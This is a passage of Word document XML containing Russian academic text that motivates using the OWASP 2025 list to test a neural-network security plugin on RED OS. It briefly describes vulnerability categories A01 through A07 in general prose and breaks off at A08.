          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Схема </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">испытательного </w:t>
      </w:r>
      <w:r w:rsidRPr="001B003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>стенда</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2328FE08" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76A637B1" w14:textId="03E28351"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BE1566">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В качестве методологической основы для проведения тестирования выбран стандарт OWASP 2025 —</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1566">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">документ, публикуемый организацией Open Web Application Security Project. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Этот список </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1566">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>представляет собой систематизированный перечень наиболее критичных и распространённых уязвимостей веб-приложений и сетевых систем, формируемый на основе анализа реальных инцидентов информационной безопасности, данных от сотен организаций и миллионов приложений по всему миру.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB83562" w14:textId="29DB3C83" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="002A245A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Выбор OWASP для тестирования плагина обусловлен его практической значимостью. Этот список не просто перечисляет уязвимости, а показывает, какие из них наиболее часто используются злоумышленниками в реальных атаках на веб-приложения. Таким образом, тестирование на</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> его</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> основе позволяет убедиться, что нейросетевой плагин эффективно обнаруживает самые актуальные и опасные угрозы, с которыми сталкиваются современные информационные системы, включая те, что работают на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>РЕД ОС</w:t>
      </w:r>
      <w:r w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Далее представлена краткая характеристика каждой из категорий списка </w:t>
      </w:r>
      <w:r w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
      <w:r w:rsidR="00A7269E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E4D801" w14:textId="4D573729" w:rsidR="008E0171" w:rsidRPr="003617AD" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">A01 — </w:t>
      </w:r>
      <w:r w:rsidR="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>арушение контроля доступа</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Наиболее распространённая категория уязвимостей, связанная с отсутствием или некорректной реализацией </w:t>
      </w:r>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ограничений на действия пользователей. Злоумышленник может получить доступ к функциям или данным, превышающим его полномочия — просматривать чужие записи, изменять права доступа или выполнять привилегированные операции без авторизации</w:t>
      </w:r>
      <w:r w:rsidR="003617AD" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3F6B51" w14:textId="246F7E0B" w:rsidR="008E0171" w:rsidRPr="00DD2F4C" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">A02 — </w:t>
      </w:r>
      <w:r w:rsidR="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>к</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>риптографические сбои</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Уязвимости, связанные с неправильной защитой данных при хранении и передаче. Включают использование устаревших алгоритмов шифрования, отсутствие шифрования конфиденциальных данных, применение HTTP вместо HTTPS, а также ненадлежащее хранение паролей. Следствием является утечка или перехват конфиденциальной информации</w:t>
      </w:r>
      <w:r w:rsidR="003617AD" w:rsidRPr="00DD2F4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0204CAD0" w14:textId="021D351D" w:rsidR="008E0171" w:rsidRPr="003617AD" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">A03 — </w:t>
      </w:r>
      <w:r w:rsidR="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нъекции</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Категория атак, при которых </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>недоверенные</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> данные передаются интерпретатору как часть команды или запроса. Наиболее распространённые виды — SQL-инъекции, позволяющие выполнять произвольные запросы к базе данных, а также межсайтовый </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>скриптинг</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, внедряющий вредоносный JavaScript-код в страницы веб-приложения</w:t>
      </w:r>
      <w:r w:rsidR="003617AD" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE52C83" w14:textId="15D0B979" w:rsidR="008E0171" w:rsidRPr="003617AD" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2F69">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>04 —</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ебезопасный</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2F69">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>дизайн</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2F69">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Категория, охватывающая архитектурные и проектировочные недостатки, которые не могут быть устранены корректной реализацией. Примерами являются отсутствие валидации загружаемых файлов, позволяющее загружать исполняемые файлы под видом изображений, и отсутствие ограничений на количество запросов</w:t>
      </w:r>
      <w:r w:rsidR="003617AD" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE951BE" w14:textId="3A8C7263" w:rsidR="008E0171" w:rsidRPr="003617AD" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>A05</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">еправильная настройка безопасности. Наиболее часто встречающаяся уязвимость на практике, возникающая вследствие неправильных настроек систем, использования конфигураций по умолчанию, открытых служб и портов, избыточных привилегий. К данной категории относятся атаки на сетевом уровне — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, сканирование портов, перебор директорий</w:t>
      </w:r>
      <w:r w:rsidR="003617AD" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F1C0AD" w14:textId="21B9DD37" w:rsidR="008E0171" w:rsidRPr="003617AD" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">06 — </w:t>
      </w:r>
      <w:r w:rsidR="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>язвимые и устаревшие компоненты. Использование библиотек, фреймворков и других программных компонентов с известными уязвимостями. Злоумышленники сканируют веб-серверы на наличие устаревших версий программного обеспечения и эксплуатируют публично известные CVE для получения несанкционированного доступа</w:t>
      </w:r>
      <w:r w:rsidR="003617AD" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40799586" w14:textId="2F5846E4" w:rsidR="008E0171" w:rsidRPr="003617AD" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>07</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>шибки идентификации и аутентификации. Уязвимости в механизмах проверки подлинности пользователей: слабые пароли, отсутствие защиты от перебора учётных данных, небезопасное управление сессиями, отсутствие многофакторной аутентификации. Эксплуатация данных уязвимостей позволяет получить несанкционированный доступ к учётным записям</w:t>
      </w:r>
      <w:r w:rsidR="003617AD" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136A0602" w14:textId="69EE59D3" w:rsidR="008E0171" w:rsidRPr="003617AD" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>A08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
